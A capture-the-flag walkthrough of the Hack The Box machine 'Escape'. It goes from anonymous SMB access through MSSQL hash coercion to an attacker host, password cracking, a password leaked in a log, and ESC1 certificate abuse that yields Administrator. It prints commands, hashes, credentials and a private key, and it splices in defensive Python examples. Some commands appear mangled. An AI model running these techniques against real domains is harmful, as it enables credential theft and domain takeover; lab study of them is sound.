Escape Walkthrough | HTB

MDbird
10 min read · May 9, 2023


Escape - HTB Windows Machine

Escape is an HTB machine rated medium difficulty and worth 30 points. During escalation we find a log file that gives us a user's credentials, and finally we abuse a certificate template to obtain the administrator's NTLM hash with tools such as openssl, Rubeus.exe and Certify.exe.

Port Scan

nmap --script vuln -sC -sV  -Pn 10.10.11.202 -oG allPorts -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-08 00:50 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.11.202
Host is up (0.80s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-08 12:51:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:microsoft:sql_server:2019:
| DF707FE2-EC27-5541-BC6A-6C7A0E9CC454 6.5 https://vulners.com/githubexploit/DF707FE2-EC27-5541-BC6A-6C7A0E9CC454 *EXPLOIT*
| CVE-2021-1636 6.5 https://vulners.com/cve/CVE-2021-1636
| CVE-2022-29143 6.0 https://vulners.com/cve/CVE-2022-29143
| CVE-2023-23384 0.0 https://vulners.com/cve/CVE-2023-23384
| CVE-2023-21718 0.0 https://vulners.com/cve/CVE-2023-21718
| CVE-2023-21713 0.0 https://vulners.com/cve/CVE-2023-21713
| CVE-2023-21705 0.0 https://vulners.com/cve/CVE-2023-21705
| CVE-2023-21704 0.0 https://vulners.com/cve/CVE-2023-21704
|_ CVE-2023-21528 0.0 https://vulners.com/cve/CVE-2023-21528
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 780.09 ms 10.10.16.1
2 780.14 ms 10.10.11.202

The domain is sequel.htb and the hostname is DC. From the protocols we can see:

  • Samba
  • LDAP
  • Kerberos
  • Winrm
  • SQL Server
  • RPC

IP = 10.10.11.202, domain = sequel.htb
We can add this domain name to the /etc/hosts file:

10.10.11.202 sequel.htb dc.sequel.htb

We see that the Samba port (445) is open and try to enumerate it.

┌──(root㉿kali)-[/home/kali]
└─# smbclient -L 10.10.11.202 -N

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.

We can access the Public share, and inside it there is a PDF file.

┌──(root㉿kali)-[/home/kali]
└─# smbclient //10.10.11.202/Public -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1471578 blocks available
smb: \> Get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (8.6 KiloBytes/sec) (average 8.6 KiloBytes/sec)
smb: \>

After downloading it we read it to see its contents. On the first page we get a username (brandon.brown), and the document explains how to access the MSSQL server.

PDF file

On the second page they give us a username and password to connect to MSSQL.

We try to log in with the credentials from the PDF and they are indeed valid. With xp_dirtree (xp_dirtree '\\10.10.16.9\content') we make the SQL server connect to our SMB server, so that it authenticates to us and we capture its NTLMv2 hash.

└─# impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> help

lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd

SQL> xp_cmdshell
xp_cmdshell
SQL> xp_dirtree
[-] ERROR(): Line 0: Error executing extended stored procedure: Invalid Parameter
SQL> xp_dirtree '\\10.10.16.9\content'
subdirectory depth

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------

SQL>

We start an SMB server with impacket, receive the hash and save it to a file.

└─# impacket-smbserver $(pwd) . -smb2support
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.202,57905)
[*] AUTHENTICATE_MESSAGE (sequel\sql_svc,DC)
[*] User DC\sql_svc authenticated successfully
[*] sql_svc::sequel:aaaaaaaaaaaaaaaa:47e065332ceced3d12ff42677ee328a7:010100000000000000a811365882d9018b93ceaaa2d23afe000000000100100071006d007400710056007300750043000300100071006d00740071005600730075004300020010004d004a00580072005900420073004700040010004d004a005800720059004200730047000700080000a811365882d90106000400020000000800300030000000000000000000000000300000217b549436b5db318fcd1f99538311afad1befb6152e12947053fdc122c659e30a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0039000000000000000000
[*] Closing down connection (10.10.11.202,57905)
[*] Remaining connections []

We try to crack it with john and obtain the password "REGGIE1234ronnie".

┌──(root㉿kali)-[/home/OS-67380]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)
1g 0:00:00:11 DONE (2023-05-09 05:30) 0.08410g/s 899983p/s 899983c/s 899983C/s RENZOJAVIER..REDMAN69
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

Before trying to connect with evil-winrm, we enumerate the users in the domain via rpcclient.

┌──(root㉿kali)-[/home/OS-67380]
└─# rpcclient -U "sql_svc" 10.10.11.202
Password for [WORKGROUP\sql_svc]:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Tom.Henn] rid:[0x44f]
user:[Brandon.Brown] rid:[0x450]
user:[Ryan.Cooper] rid:[0x451]
user:[sql_svc] rid:[0x452]
user:[James.Roberts] rid:[0x453]
user:[Nicole.Thompson] rid:[0x454]
rpcclient $>

Via evil-winrm we connect with the credentials we obtained.

└─# evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\sql_svc\Documents> cd ..
*Evil-WinRM* PS C:\Users\sql_svc> cd ..
*Evil-WinRM* PS C:\Users> dir


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc


*Evil-WinRM* PS C:\Users>

We find this log file in the SQLServer folder; it contains another user's credentials.

*Evil-WinRM* PS C:\Users> cd /
*Evil-WinRM* PS C:\> dir


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM Windows


*Evil-WinRM* PS C:\> cd SQLServer
*Evil-WinRM* PS C:\SQLServer> dir


Directory: C:\SQLServer


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe

*Evil-WinRM* PS C:\SQLServer\Logs> dir


Directory: C:\SQLServer\Logs


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK


*Evil-WinRM* PS C:\SQLServer\Logs> Select-String "Password" ERRORLOG.BAK

ERRORLOG.BAK:70:2022-11-18 13:43:06.75 spid18s Password policy update was successful.
ERRORLOG.BAK:112:2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
ERRORLOG.BAK:114:2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]


*Evil-WinRM* PS C:\SQLServer\Logs>

Here we get another user in addition to the ones above: the failed logon for 'NuclearMosquito3' is recorded from the same client immediately after Ryan.Cooper's failed logon, which is what a password typed into the username field looks like, so we try it as Ryan.Cooper's password:
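The Select-String above is the whole detection, done by hand. A defender would rather run the same check over every SQL Server ERRORLOG on a schedule. The Python below is an added example, not part of the original write-up: it parses the "Logon failed for user" lines, treats any 'user' value that is neither domain-qualified nor a known SQL login as a possible password, and pairs it with the real account whose failed logon from the same client immediately preceded it. The SAMPLE_ERRORLOG lines are the ones from the log excerpt above; the set of known SQL logins is an assumption.

```python
import re
from datetime import datetime

# The three lines matched by the Select-String above, taken from the ERRORLOG.BAK excerpt
# (page data, not constructed), with the column spacing SQL Server writes.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:06.75 spid18s     Password policy update was successful.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
"""

# Timestamp, the 'Logon' source column, the quoted login name and the optional client address.
LOGON_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2,3})\s+Logon\s+"
    r"Logon failed for user '(?P<name>[^']*)'.*?"
    r"(?:\[CLIENT: (?P<client>[^\]]+)\])?\s*$"
)


def _looks_like_account(name: str, known_logins: set) -> bool:
    """DOMAIN\\user and user@domain are real principals; so is any SQL login we know about.
    Anything else in the 'user' field was probably not meant to be a user name."""
    return "\\" in name or "@" in name or name.lower() in known_logins


def find_leaked_passwords(log_text: str, known_logins: set, window_seconds: float = 5.0) -> list:
    """Return one finding per suspicious 'user' value, paired with the real account whose
    failed logon from the same client immediately preceded it (None if there is none)."""
    known = {k.lower() for k in known_logins}
    events = []
    for line in log_text.splitlines():
        m = LOGON_FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["name"], m["client"]))

    findings = []
    for i, (ts, name, client) in enumerate(events):
        if _looks_like_account(name, known):
            continue
        owner = None
        # Walk back through earlier failures inside the window; the nearest one for a real
        # account from the same client is the probable owner of the mistyped credential.
        for prev_ts, prev_name, prev_client in reversed(events[:i]):
            if (ts - prev_ts).total_seconds() > window_seconds:
                break
            if prev_client == client and _looks_like_account(prev_name, known):
                owner = prev_name
                break
        findings.append({
            "timestamp": ts.isoformat(sep=" ", timespec="milliseconds"),
            "leaked_value": name,
            "probable_account": owner,
            "client": client,
        })
    return findings


if __name__ == "__main__":
    # Assumed set of legitimate SQL logins on this instance (the PDF's PublicUser plus sa).
    for f in find_leaked_passwords(SAMPLE_ERRORLOG, {"sa", "PublicUser"}):
        print(f"{f['timestamp']}  value {f['leaked_value']!r} in user field; "
              f"probable account {f['probable_account']!r} from {f['client']}")
```

The pairing step matters more than the regex: a lone odd-looking login name is noise, but an odd value logged a few hundredths of a second after a real account's failure from the same client is almost always that account's password, and that is the line that should trigger a password reset rather than sit in a backup log readable by a service account.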

└─# evil-winrm oscarakaelvis/evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ..
*Evil-WinRM* PS C:\Users\Ryan.Cooper> cd Desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir


Directory: C:\Users\Ryan.Cooper\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/9/2023 7:55 AM 3846 cert.pem
-a---- 5/9/2023 1:58 PM 3425 cert.pfx
-a---- 5/9/2023 7:35 AM 174080 Certifyyt.exe
-a---- 5/9/2023 7:36 AM 446976 Rubeuss.exe
-ar--- 5/9/2023 7:18 AM 34 user.txt


*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
a7002d95aacdef1b67f217e43bb86f0d

We transfer Certify to the box and run it to look for vulnerable certificate templates.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certifyyt.exe find /vulnerable

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

Enumerating with Certify.exe reveals the vulnerable template. Next we follow the tutorial at https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin

With it we can obtain a private key and certificate by submitting a request against the vulnerable template.
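The Certify output above already contains every attribute needed to decide whether a template is ESC1-abusable. The Python below is an added example, not the author's or Certify's code: it encodes the ESC1 preconditions (enrollee supplies the subject, a logon EKU, no manager approval, no authorized signatures, Enroll granted to a low-privilege group) as a check over template attributes, applies it to the UserAuthentication template exactly as printed above, and shows a remediated copy that no longer satisfies the conditions. The CertTemplate structure, the LOW_PRIVILEGE_PRINCIPALS set and the remediate() choices are my assumptions.

```python
from dataclasses import dataclass

# Groups whose Enroll right means "any domain account can enroll" (an assumed list, lower-case).
LOW_PRIVILEGE_PRINCIPALS = {"domain users", "authenticated users", "domain computers", "everyone"}
# EKUs that let the resulting certificate authenticate a principal (PKINIT / Schannel logon).
LOGON_EKUS = {"client authentication", "smart card logon", "pkinit client authentication", "any purpose"}


@dataclass(frozen=True)
class CertTemplate:
    """The attributes Certify prints per template, as an assumed structure for this check."""
    name: str
    name_flags: frozenset        # msPKI-Certificate-Name-Flag
    enrollment_flags: frozenset  # msPKI-Enrollment-Flag
    ekus: frozenset              # pKIExtendedKeyUsage
    authorized_signatures: int   # msPKI-RA-Signature
    enrollment_rights: frozenset # principals granted Enroll (domain prefix already stripped)


def _lower(values) -> frozenset:
    return frozenset(v.lower() for v in values)


def esc1_conditions(t: CertTemplate) -> dict:
    """Each ESC1 precondition as a named boolean. All true = a low-privilege requester can ask
    for a logon certificate carrying an arbitrary SAN and have it issued without review."""
    weak_enrollers = _lower(t.enrollment_rights) & LOW_PRIVILEGE_PRINCIPALS
    return {
        "enrollee supplies subject (ENROLLEE_SUPPLIES_SUBJECT)":
            "enrollee_supplies_subject" in _lower(t.name_flags),
        "certificate usable for logon (logon EKU or no EKU)":
            not t.ekus or bool(_lower(t.ekus) & LOGON_EKUS),
        "no manager approval (PEND_ALL_REQUESTS not set)":
            "pend_all_requests" not in _lower(t.enrollment_flags),
        "no authorized signature required":
            t.authorized_signatures == 0,
        "low-privilege principals can enroll: " + ", ".join(sorted(weak_enrollers)):
            bool(weak_enrollers),
    }


def esc1_findings(t: CertTemplate) -> list:
    return [label for label, hit in esc1_conditions(t).items() if hit]


def is_esc1(t: CertTemplate) -> bool:
    return all(esc1_conditions(t).values())


# The UserAuthentication template exactly as Certify printed it above.
USER_AUTHENTICATION = CertTemplate(
    name="UserAuthentication",
    name_flags=frozenset({"ENROLLEE_SUPPLIES_SUBJECT"}),
    enrollment_flags=frozenset({"INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS"}),
    ekus=frozenset({"Client Authentication", "Encrypting File System", "Secure Email"}),
    authorized_signatures=0,
    enrollment_rights=frozenset({"Domain Admins", "Domain Users", "Enterprise Admins"}),
)


def remediate(t: CertTemplate) -> CertTemplate:
    """Two independent fixes, either of which alone breaks the ESC1 chain: build the subject
    from the AD object instead of the request, and take Enroll away from low-privilege groups."""
    return CertTemplate(
        name=t.name,
        name_flags=t.name_flags - {"ENROLLEE_SUPPLIES_SUBJECT"},
        enrollment_flags=t.enrollment_flags,
        ekus=t.ekus,
        authorized_signatures=t.authorized_signatures,
        enrollment_rights=frozenset(
            p for p in t.enrollment_rights if p.lower() not in LOW_PRIVILEGE_PRINCIPALS
        ),
    )


if __name__ == "__main__":
    for tpl in (USER_AUTHENTICATION, remediate(USER_AUTHENTICATION)):
        print(f"{tpl.name}: {'ESC1' if is_esc1(tpl) else 'not ESC1'}")
        for line in esc1_findings(tpl):
            print("  -", line)
```

Run as-is it reports the five conditions for UserAuthentication and only three for the remediated copy, which is the point: a template that still has a logon EKU and no approval step is fine as long as the CA, not the enrollee, decides whose name goes in the certificate, or as long as only trusted groups can enroll. The same check can be fed from an LDAP query of CN=Certificate Templates under the Configuration naming context instead of Certify output.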

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certifyyt.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcrede
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Request a Certificates

[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator

[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA

[*] CA Response : The certificate had been issued.
[*] Request ID : 10

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAz1/6/MnrhBwSBZ5VVwlGN2bifCfCp2YTUHrgqVBRjQ2ibYDm
W5Ys36fYLxP4EpWIoU3HPKT3njF3z+fkrxpbMBTh+0pHDZYG3oHIZWiQgWEqYlI5
5ETZ/i99imQdTnPSqL2b9SNZzxG1PMBW/Iwn3mv+HYie9yeAR7sKJMtumWxcwd3X
oclDOwXgtl165Fzwp7tJRFFcCXje5LCKdn2XO//3yCAD8j3TozbI6cBXUKrQFvrC
qReMjb/7K5iWpwa7IZcWK/lXvWkrYuL+iE20cxaqH9Z+QMvlWfvPLNEKzeBkJPKG
5InUb++Rvpt4pv3TyPV5uZHYMsUxZBlnPcpdCQIDAQABAoIBAQCXD5fJpV1Gsxv9
s8T+zea0XOIHBv+o6ZaQPbKCI9wEIDZ+BjPH67FsitvUD3vaLcuFlR7ZcmJefjKE
5KuVUmGyuMOVRhpUL0F5vJi6Jl19ocY6MSOywOT7YKTWtu8SQxTljpmZDNNTH9ci
FgpHleFFCO3nnaoO6Ftt5TYSb451e0Z2UIMiNo7QTlPLXHqVmkUCuVEhIsL0aAYh
cNao37XLh1NnF7c4wgxe9Z48QuZMCC0eiki+dgjHAzU8r+Gidx6hdAHAPk3doq+3
aWgEVeIkbtrGVh/Ue5R/+QXqtK1pjUgRqpCgzVDGKEW4ZxCoME7UlP4+aLpCjfPV
6oP23PWxAoGBAO+NonQPYYx5chuDnXogQuNEfYEJuRdLIRNH/lB1MmdU9YfI0lp9
Cn1/+s+a/UCxcTNE+aViXgWGDUnQev+sc4indybdUqK+MZpm+Ttay4wm/X5zIGw3
OhhPE3yvvXCDjQ5bCbJUDVz/Y6fIzwXgMt0B88VOkH1OHSKw9nnIMOzXAoGBAN2c
yE31Jk8Nx//VCR0s68WMQwRAwFtxC1tsWsFBrCVldU4CHjQE586BxejIDZGehoC/
8nJczYXCSZa81WZRl3WyX2h+5BASaVJtDaaIh62X9b2A6A7DWNNk4UxQBMfLVHaX
NczjjL0A1PM+gh69x2MdNpWIrO0Y0hBwGBXiYukfAoGBAKc0hR/dXIlge3UY+OI1
gnp/Y9qdnsPTfNKofapLI1NcycRtN+ZRQPE4Uyh1Vi/BqvHOQzJc5qOUXdIX4sJy
7HGF8nT+Jp/RgW30UiJLzaeVz3pjgU4HflVZXJC7Wc8fA2XxxWLjqDAxUq3aTCYd
x2Lb6freS5wq2ctNGb0HLp8hAoGBAM6085zLgk0QlLFLO3IMOWqNFuF7qDBis+41
lj1WjURga1c04Iky3ikfoMMs/oMKM3kaEQGdEFKoU02XmxESH803cIieewmGstig
QbBI/wzrhdqZx1ol2c9r9D3jEWJuhL0M87DFurt8cCTm9CXKbJVFZWl7D5kjoqSU
edLH0+yPAoGAHe6D2swc6ykLpZIZM5ldb3fBL6uhwfspVxHL2GQBQvJj/bLrH02X
8k5mLHnt8Ljjc3lY9lsHH0Gfa7elV2aBu11y0qdTLL4WZxdXOl65J5WI3NquVbRt
XPxwgJbHM2iyA6CRUG1WoRU+hyL1SY0xYIYyqh5rphN9KDXi2ZMoWwc=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAoi1+tHvjFpGwAAAAAACjANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwNTA5MTQyODU4WhcNMjUwNTA5
MTQzODU4WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPX/r8yeuEHBIFnlVXCUY3ZuJ8
J8KnZhNQeuCpUFGNDaJtgOZblizfp9gvE/gSlYihTcc8pPeeMXfP5+SvGlswFOH7
SkcNlgbegchlaJCBYSpiUjnkRNn+L32KZB1Oc9KovZv1I1nPEbU8wFb8jCfea/4d
iJ73J4BHuwoky26ZbFzB3dehyUM7BeC2XXrkXPCnu0lEUVwJeN7ksIp2fZc7//fI
IAPyPdOjNsjpwFdQqtAW+sKpF4yNv/srmJanBrshlxYr+Ve9aSti4v6ITbRzFqof
1n5Ay+VZ+88s0QrN4GQk8obkidRv75G+m3im/dPI9Xm5kdgyxTFkGWc9yl0JAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFEF6qFM3Fmuinee1R3Z3kvnE1BIo
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAQwN7i4MIC43KlaVb+7m9xG3ATqYY0L5G/eFNCUSYvJFNDXyXPA7n+Zwl
bjn8JHMInaMMnjesUUOyNxNdJYiBfuPaeKlnxGZz0WMu93FlTwxPhP3NmcUQhncl
zn2MXU1z3do0pYK42PZc1Lh5+ngq9/orfS9zIUKxObEw3r42wG0zMv4tGof9AAp3
31hhgckbkLgqyfCJO6a8pScGYbTt5rhuUQTn2O9QTyGj5UXcr8NmY8LRfj/HOXb+
gAoqAvrNa6FXLhMWsxq7R7UL+zlzPdJIkNgiFnGIfTS2Vfn5bTanAJ1BbsQ2ZVoC
tS/2moqb0YxQmCdaYU1nlBqsXEt4BQ==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

